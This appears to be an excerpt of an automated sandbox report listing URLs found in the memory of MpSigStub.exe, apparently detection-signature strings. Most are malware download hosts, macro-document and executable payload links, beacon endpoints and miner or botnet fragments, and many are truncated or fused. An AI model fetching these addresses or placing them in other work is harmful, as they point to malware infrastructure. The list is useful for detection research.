Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://45.12.32.58/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://45.12.32.87/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://45.12.32.9/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://45.138.157.216/44313
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://45.139.236.86/scan.wbk?raw=true
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp String found in binary or memory: http://45.144.30.16/
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://45.145.185.85xmr=network001sys=sysrv002#killoldfilespkill-9
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: http://45.150.67.233/
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://45.55.29.117/download/nsis/pb_nsissetup.exe
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://45.63.107.19/PhilaeAp05.cpl
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://45.77.255.68/5.sctscrobj.dll
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://45.78.21.150/boost/boosting.exe
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://45.84.1.195/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://45.89.127.230/images/yellowtank.png-o%appdata%
Source: MpSigStub.exe, 00000024.00000003.6347522364.00000197A3B80000.00000004.00000001.sdmp String found in binary or memory: http://45.9.148.35/chimaera/bin/rpm_deb_apk/x86_64/openssh.rpm
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://45.9.148.35/chimaera/sh/
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://45.90.59.77/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://45.90.59.97/44313
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://46.101.202.232/wp-includes/mx_ib/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://46.183.220.123/wxx.doc
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://46.243.136.238/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://46.30.43.8/gw.exe
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://47.89.187.54
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://4threquest.me/
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://4udating.net
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://5.1.83.182:8000/cgi-bin/hello.py?
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://5.135.73.116/win/document_0120200.doc
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://5.149.248.85/flashsec.exe
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://5.149.248.85/flashupdate.exe
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://5.149.248.85/info.txt
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://5.152.203.117/tues/invoice.doc
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://5.34.180.57/44313
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://5.39.124.175/files/module.exe
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://5.39.217.221/win/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://5.39.219.206/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://50.63.128.
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://51.255.155.1/pages/filecloud/5e2d7b130cf4feb03023e580b3432fa9d71d7838.exe
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://51.75.142.21/
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://51.81.114.167:
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp String found in binary or memory: http://513389.cn/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://54.183.79.85/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://54.187.129.3/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://54.191.142.124/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://54.191.185.232/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://54.193.9.202/
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp String found in binary or memory: http://54.214.246.97/log/SilentUpdater7/install
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://54.215.150.138/
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://54.237.176.95/z2.php?a=%s&b=%d&c=%d&d=%d&e=%d&f=%d&g=%s&h=%d&i=%d&z=%d&y=%d
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://54.237.176.95/z2.php?a=%s&b=%d&c=%d&d=%d&e=%d&f=%d&g=%s&h=%d&i=%d&z=%d&y=%dx
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://54.37.16.60/up/
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://54.39.233.130/de3.tmp
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp String found in binary or memory: http://56489.eu5.org
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://58.65.235.3/up/get_exa.php?l=
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://58.65.239.124/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://58.65.239.82
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://5p0h.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://5p0h.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://5starvideos.com/main/
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://5starvideos.com/main/K
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://5starvideos.com/main/K5
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://61.135.159.183/installer/sobar.exe
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://61.160.222.11:
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://61.19.253.
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://62.109.31.216/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://62.210.214.
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://63.219.176.248/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/CFL/
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/EX/
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/EX/x
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/K/F
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://63.219.178.162/NL2/?w=
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://63.251.20.97/links/return-west.php
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://64.156.31.
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp String found in binary or memory: http://64.27.0.205
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp String found in binary or memory: http://64.27.0.205/up/calc2.bin
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://64.28.184.4/js.php?id=2011
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp String found in binary or memory: http://65.243.103.
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://65.243.103.58/trafc-2/rfe.php
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://65.243.103.58/trafc-2/rfe.phpg
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://65.243.103.80/80
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://66.117.6.174/ups.rar
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://66.40.9.246/binaries
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://66.98.138.92/PH/
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://67.15.
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: http://67.18.111.82:8088
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://67.210.122.222/~turks/lego/
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp String found in binary or memory: http://68.178.225.162
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp String found in binary or memory: http://69.31.80.
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://69.31.84.223/
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: http://69.50.164.11/v1/mh.php?pid=%s&cid=%s&p=%s&t=%s&vh=%i&vt=%i
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://6flp.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://6tof.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6273043144.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://7-.j-z-0-3-0-u-u-x-f-1l-3-l-h-w-b-q-z-u-5-n-l-l-m-s-5-v-s-z-g.info
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://70.38.40.185
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://72.29.80.113/~nossacai/
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://75.127.1.211/hkcmd/document.doc
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://76h1.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://77.81.225.138/carnaval2017.zip
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://78.128.92.108/document/word.doc
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://78.128.92.26/
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp String found in binary or memory: http://78.157.143.251
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://78.24.220.183/
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://78.46.16.53/~quickend/lll.php
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://79.110.52.186/bayo/b.wbk
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://79.110.52.186/fide/f.wbk
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://79.110.52.186/naki/n.wbk
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp String found in binary or memory: http://8.8.8.8/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://81.16.141.208/q37kkp
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://81.176.237.140/serv/
Source: MpSigStub.exe, 00000024.00000003.6437007963.00000197A4B3B000.00000004.00000001.sdmp String found in binary or memory: http://81.177.26.20/ayayay
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://81.29.241.70/new/counter.phpframeborder=
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://82.118.23.186/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://82.98.119.68/wp-admin/app/alim.doc
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://82.98.119.68/wp-admin/app/updates.doc
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp String found in binary or memory: http://82.98.235.
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://82.98.235.63/cgi-bin/check/autoaff3
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: http://83.136.232.110/44285
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://83.149.75.54/cgi-bin
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://83.166.242.164/desktop-st7lsde/
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: http://83.166.242.164/desktop-st7lsde/bid/relay.dot
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://83.166.242.164/desktop-st7lsde/nay.dot
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://83.166.246.59/sgz2/rejoice/lowered.dot
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp String found in binary or memory: http://85.17.138.60
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://85.17.3.151/cgi-bin
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: http://85.17.93.189/iddq/m
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://85.234.191.170/inst.php?id=
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://85.234.191.a7
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://85.255.11
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp String found in binary or memory: http://85.255.119
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://85.255.11http://ad.eltext.comhttp://ad.tuzikmedia.biz.rsrc
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://88.208.17.127/
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://888888.2288.org/Monitor_INI
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://88888888.7766.org/ExeIni
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: http://89.188.16.
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://89.188.16.18/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://89.248.161.2/yourdoc.doc
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://89.45.14.196/p1/server
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://8nasrcity.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://9.bohmamei.com/links/return-west.php
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://91.108.68.202/up.php
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://91.188.117.157/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://91.188.124.171/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://91.238.134.77/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://91.239.15.61/google.js
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://92.222.7.
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://92.38.135.46/43cfqysryip51zzq.php
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://92.63.197.106/c.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://92.63.197.153/blowjob.exe
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://92.63.197.153/good.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://92.63.197.48/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://92.63.197.48/g
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://92.63.197.60/c.exe
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://93.189.43.3/kinsingchmod
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://94.102.14.
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://94.103.85.236/ds/11.gif
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://94.156.174.7/up/a1a.htmyx_h=
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://94.23.210.144/promo/promo.php
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://94.23.39.156/fakeav/files.php?jsoncallback=?
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://94.75.
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://95.173.183.
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://95.46.99.199/template.doc
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp String found in binary or memory: http://95.64.47.164/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://980.jlbtcg.cn
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://9ifz.org/2345
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://9o0gle.com/
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://Botnet.8800.org
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://Motobit.cz
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://YOURSITE.com/bot.exea
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://a-search.biz/&
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://a.pomf.cat/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://a.pomf.cat/zjiqnx.html
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://a.pomfe.co/hnwila.xml
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://a.up-00.com/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://a0571310.xsph.ru/djfklvk/revert.php
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp String found in binary or memory: http://aaacollectionsjewelry.com/x9djsa
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://aancyber77.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://aapache.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://aartemis.com/?type=sc&ts=
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://abeidaman.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://abluefantasies.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://about:blankhao.360.cn
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://abraandthong.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://acacia19.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://academiamylife.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://acayipbiri.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://acceso.masminutos.com
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: http://acetica.online/presently/refuge/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://acipatobo01.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://actionforfiletransferthroughcloudbusinessinternationalglobalsys.ydns.eu/business/business.doc
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp String found in binary or memory: http://activecodec.0fees.net/codec/mp3/codec_download.htm
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://activedating.net
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: http://actresswallpaperbollywood.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://acutelogisticsltd.com/wp-content/themes/acutelogisticsltd/js/ie-emulation-modes-warning.js
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://ad.171817.com/css/1.js
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://ad.eltext.com
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://ad.tuzikmedia.biz
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://adaptservices.net/qwao8cj4gkogu
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://addictedtobash.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://adobe-mark.byethost3.com/adobe-mail/pdf.php)
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://adoffy.alltuckedinathome.com:8080/led.js
